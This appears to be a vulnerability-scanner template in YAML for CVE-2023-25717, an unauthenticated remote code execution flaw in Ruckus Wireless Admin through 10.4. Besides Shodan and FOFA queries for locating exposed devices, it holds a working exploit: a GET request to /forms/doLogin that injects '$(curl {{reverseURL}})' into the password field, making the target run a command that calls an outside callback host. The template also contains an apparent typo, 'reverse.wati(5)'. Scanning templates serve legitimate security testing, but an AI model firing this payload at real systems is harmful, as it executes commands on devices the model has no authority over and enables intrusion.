id: CVE-2023-25717

info:
  name: Ruckus Wireless Admin - Remote Code Execution
  author: parthmalhotra,pdresearch
  severity: critical
  verified: false
  description: |
    Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
    shodan-query: title:"ruckus wireless"
    fofa-query: title="ruckus wireless"
  reference:
    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
    - https://support.ruckuswireless.com/security_bulletins/315
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25717
  tags: cve,cve2023,ruckus,rce
  created: 2023/06/07

set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  r0:
    request:
      method: GET
      path: /forms/doLogin?login_username=admin&password=password$(curl%20{{reverseURL}})&x=0&y=0
    expression: |
      response.status == 302 &&
      reverse.wati(5)
expression: r0()